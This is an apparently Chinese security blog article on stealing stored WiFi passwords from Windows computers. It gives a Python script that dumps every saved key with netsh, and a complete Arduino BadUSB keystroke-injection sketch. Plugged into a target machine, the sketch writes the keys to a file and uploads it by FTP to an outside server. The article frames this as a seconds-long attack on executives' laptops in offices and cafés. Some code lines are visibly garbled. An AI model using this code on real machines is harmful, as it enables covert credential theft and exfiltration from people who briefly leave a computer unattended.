你电脑的 WiFi 密码全是我的

import os
import re
wifi=('netsh wlan show profiles ')
#name=Hello World key=clear
with os.popen(wifi) as f:
   wifiname_list=[]
   for line in f:
       if'所有用户配置文件 :'in line:
           #print(line)
           line= line.strip()
           wifiname= line.split(':')[1]
           wifiname_list.append(wifiname)
   print(wifiname_list)
for i in wifiname_list:
   get=('netsh wlan show profiles name={} key=clear').format(i)
   withos.popen(get) asr:
       print(r.read())
   r.close()  
   #可以自己添加一些语句把输出保存到U盘或者某个地方（感谢群里面的小姐姐对本代码的修改和审核--CTF 小姐姐）

本文作者：hodit/98（信安之路无线安全小组）

无线技术的发展使我们享受到了无线自由的便利，但也带来了越来越多的安全问题。目前主流的WiFi密码破解方法，如跑字典和钓鱼WiFi，都有各自的优缺点。跑字典需要大量的字典数据和算力设备，而钓鱼WiFi则需要长时间的等待。然而，这些方法并不能百分之百地破解目标WiFi密码。接下来，我们将介绍一种非常简单的方法来收集WiFi密码和WiFi名称。

在之前的文章《打造属于自己的渗透神器2》中，我们提到可以使用DOS命令自动搜索WiFi密码。现在，让我们来实现这个方法。我们都知道，每个WiFi都有其信号范围，如果我们想要破解某个WiFi，就需要在该范围内进行操作。当然，我们的攻击也需要在目标电脑上运行一个DOS命令，用于查询该电脑之前连接过的WiFi密码。

下面是显示了目前这台电脑连接过的WiFi密码的DOS命令。当我们想要显示某一个WiFi的密码时，如图所示，会出现该WiFi的相关信息。我们继续往下看，会看到我们想要的密码。接下来，我们需要整理思路！

整理完思路后，我们就可以开始动手了！

运行完后，我们得到了我们想要的结果。但是，你有没有想过，当我在目标电脑上运行这个程序时，至少需要目标电脑的用户离开电脑一分钟左右。为什么呢？因为你需要将这个程序安装到目标电脑上并运行，然后保存目标电脑上的所有WiFi连接数据，或者将其复制到U盘中。这些都需要时间，并且可能会被杀毒软件查杀。

#include //包含键盘模块的头文件
Keyboard.begin(); //开启键盘通信
Keyboard.press(); //按下某个键
Keyboard.release();//释放某个键
Keyboard.println(); //输入某些内容和一些网上的解释不同 网上解释是输入内容并且能回车，而我测试的时候并不能回车可能和版本有关 不要不要担心有办法回车
Keyboard.end(); //结束键盘通信

那么，有没有办法在极短的时间内将目标电脑上的所有WiFi数据发送到一个地方呢？当然有！请看这里：

我们可以将HID攻击与之组合。HID代表Human Interface Device，根据名称可以了解到HID设备是直接与人交互的设备，例如键盘、鼠标和游戏杆等。但是，HID设备并不一定需要人机接口，只要符合HID类别规范的设备都可以被称为HID设备。一般来说，针对HID的攻击主要集中在键盘和鼠标上，因为只要控制了用户的键盘，基本上就等于控制了用户的电脑。攻击者会将攻击隐藏在一个正常的鼠标或键盘中，当用户将带有攻击向量的鼠标或键盘插入电脑时，恶意代码会被加载和执行。

这时，我们的思路就要改变了：

实验环境（以下实验具有一定的攻击性）：

1. Teensy++ 2.0（硬件）价格在30-50元之间
2. Teensyduino插件
3. Arduino环境
4. Digispark ATtiny（本项目使用的环境，在之前的文章中有提到《》）

既然是HID攻击，我们就需要知道键盘输入的语句。Arduino提供了以下键盘函数。

void setup()      //初始化函数
{
delay(500);
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
delay(500);
Keyboard.press('r');
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("cmd");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print("E:");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.print("netsh wlan show profile name=* key=clear > stealer.txt");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(2000);
Keyboard.print("ftp -i 009.3vftp.com"); // ftp服务器地址
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(3000);
Keyboard.print("your username");  //ftp账号 Keyboard.press(KEY_RETURN);   Keybo
ard.release(KEY_RETURN);
delay(1000);
Keyboard.print("your password");    //ftp密码 Keyboard.press(KEY_RETURN);   Keybo
ard.release(KEY_RETURN);
delay(1000);
Keyboard.print("put stealer.txt");  delay(3000);  Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
}
void loop() {   }   //循环函数

攻击程序：

运行完后，如图所示，目标电脑会向攻击者的FTP地址发送之前保存的所有WiFi密码和名称。我们可以发现，这次攻击只花费了0.47秒就完成了对本机所有WiFi密码的搜索、保存和上传。

总结：
这种攻击方法相对隐蔽，但危害性较大。例如，如果你是某企业的高管，每天带着电脑去各个地方开会，连接各种无线网络，你的电脑会保存很多地方的WiFi密码和名称。只要攻击者接触你的电脑2-3秒钟，就可以完成对你电脑上WiFi密码和名称的收集和上传，从而进行一些恶意操作。这种攻击手法非常适合在会议室、办公室、咖啡厅等地使用，只需要抓住几秒钟的时间就可以完成攻击。

不知道这个演示给你们带来了什么样的思考，对我来说，安全就是在眨眼间发生的事情。既然可以收集WiFi密码，那也就可以收集电脑中的数据并进行上传。